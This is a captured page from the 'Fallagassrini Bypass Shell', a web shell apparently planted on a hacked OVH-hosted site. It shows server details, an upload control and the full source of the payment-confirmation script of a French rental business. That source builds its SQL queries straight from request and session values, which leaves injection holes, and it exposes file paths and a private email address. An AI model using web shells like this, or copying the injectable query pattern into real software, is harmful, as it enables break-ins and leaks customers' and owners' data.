Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/happyrenas/old/happy-r.fr/transfere_pro/mangopay/OLD/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/happyrenas/old/happy-r.fr/transfere_pro/mangopay/OLD/3dsecure.php

<?php
session_start();
$page='paiement';
include("../config.php");
$transactionId		=		$_REQUEST['transactionId'];
// MISE A JOUR BDD
				if ($_SESSION['reservation_id'])
				{
				$requete="UPDATE  reservation set statut	='4', paymentid='".$transactionId."' where id	=".$_SESSION['reservation_id'];
				//echo $requete;
				$db->query($requete);
				}
				//echo "<br>Variable1 : ".$_SESSION['passage'];
				//echo "<br>Req : ".$requete;
?>
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
	<head>
		<title>Module de paiement en ligne</title>
		<meta name='description' content=""/>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />

		<link rel="icon" href="images/icone.ico"/>
		<!--[if lt IE 9]>
            <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
        <![endif]-->
		<link rel="stylesheet" href="design.css" type="text/css" media="screen" />
		<script type="text/javascript" src="js/prefixfree.js"></script>
	</head>
	
	<body>
		<header>
			
		</header>
		<section id="main-content">
			<p id="top"></p>
			<div>
				<div id="bloc-paiement">
					<p class="font11">







<?
	 print '<div style="color:green;">'.
                    'Votre paiement a été validé. '
                    //.'Pay-In Id = ' . $createdPayIn->Id 
                    //. ', Wallet Id = ' . $createdWallet->Id 
                . ' ('.$transactionId.')</div>';

// ENVOI DU MAIL DE VALIDATION AU PROPRIETAIRE//
				//////////////////
				require "../includes/class.phpmailer.php";
				if ($_SESSION['reservation_id'])
				{
				

				
				
				$myquery = "SELECT * from reservation where id	=".$_SESSION['reservation_id'];
				$laresa = $db->get_row($myquery);
				$id_du_logement=$laresa->id_logement;
				$date1=$laresa->date1;
				$date2=$laresa->date2;
				$client_mail=$laresa->mail;
				
				
				$myquery = "SELECT * from logement where id	=".$id_du_logement;
				$lelogement = $db->get_row($myquery);
				$nom_logement=$lelogement->label;
				$nom_logement=utf8_decode($nom_logement);
				
				
				/* AJOUT  15/02/2016*/
				$myquery = "SELECT * from proprietaire where id=".$lelogement->id_proprietaire;
				$leproprietaire = $db->get_row($myquery);
				$proprietaire_mail=$leproprietaire->mail;
				$proprietaire_nom=$leproprietaire->nom;
				$proprietaire_prenom=$leproprietaire->prenom;
				/* FIN AJOUT  15/02/2016*/
					
				include('mailing_template_paiement_proprietaire.php');
				
				
				
				$objet="Confirmation paiement  ".$nom_logement." du ".date("j-m-Y", strtotime($date1))." au ".date("j-m-Y", strtotime($date2));
				
				
				
				$from="contact@happy-r.fr";
				$to_1=$proprietaire_mail;
				$reply=$nom_du_mail;
				$mail = new PHPmailer();
				$mail->IsHTML(true);
				$mail->From=$from;
				$mail->AddAddress($to_1);
				$mail->AddBCC("resa@happy-r.fr");
				$mail->AddBCC("phil_aph@hotmail.com");
				$mail->AddReplyTo($reply);	
				$mail->Subject=$objet;
				$mail->Body=$message;
				if(!$mail->Send())
				{echo $mail->ErrorInfo;}
				else{echo '';}
				unset($mail);
				}
				
				
				if ($_SESSION['client_mail'])
				{
				// ENVOI DU MAIL DE VALIDATION AU CLIENT//
				//////////////////
				
				
				$lien=$nom_de_domaine."/administration/templates/admin2/contrat.php?reservation_id=".$_SESSION['reservation_id'];
				$signature = $_SESSION['proprietaire_prenom']." ".$_SESSION['proprietaire_nom'];
				$mail_proprietaire=$_SESSION['proprietaire_mail'];
				include('mailing_template_paiement_client.php');
				
				$myquery = "SELECT * from reservation where id	=".$_SESSION['reservation_id'];
				$laresa = $db->get_row($myquery);
				$id_du_logement=$laresa->id_logement;
				$date1=$laresa->date1;
				$date2=$laresa->date2;
				
				
				$myquery = "SELECT * from logement where id	=".$id_du_logement;
				$lelogement = $db->get_row($myquery);
				$nom_logement=$lelogement->label;
				$nom_logement=utf8_decode($nom_logement);
				
				
					
				$objet="Confirmation paiement  ".$nom_logement." du ".date("j-m-Y", strtotime($date1))." au ".date("j-m-Y", strtotime($date2));
				
				$from="contact@happy-r.fr";
				$to_1=$_SESSION['client_mail'];
				$reply=$nom_du_mail;
				$mail = new PHPmailer();
				$mail->IsHTML(true);
				$mail->From=$from;
				$mail->AddAddress($to_1);
				$mail->AddBCC("resa@happy-r.fr");
				$mail->AddReplyTo($reply);	
				$mail->Subject=$objet;
				$mail->Body=$message;
				if(!$mail->Send())
				{echo $mail->ErrorInfo;}
				else{echo '';}
				unset($mail);
				}
				
				

	
	
	
	
$_SESSION = array();						
						?>
					</p>
				</div>
			</div>
		</section>
		<footer>
			<div>
				<p>
					<br/><br/>
					© Copyright 2014 - Happy Rentals - Tous droits réservés - Marque déposée<br/>
					Happy R protège les clients des faux propriétaires ou de personnes qui usurpent l'identité de vrai propriétaire.
				</p>
			</div>
		</footer>
	</body>
	
	<!-- SCRIPTS -->
	
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js" type="text/javascript"></script>  
	<script src="js/smoothscroll.js"></script>
	
	<script type="text/javascript">
		function inputFocus(input) {
		if(input.value==input.defaultValue) {
		input.value = '';
		}
		}
		function inputBlur(input) {
		  if(input.value=='') {
			input.value = input.defaultValue;
		  }
		}
	</script>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net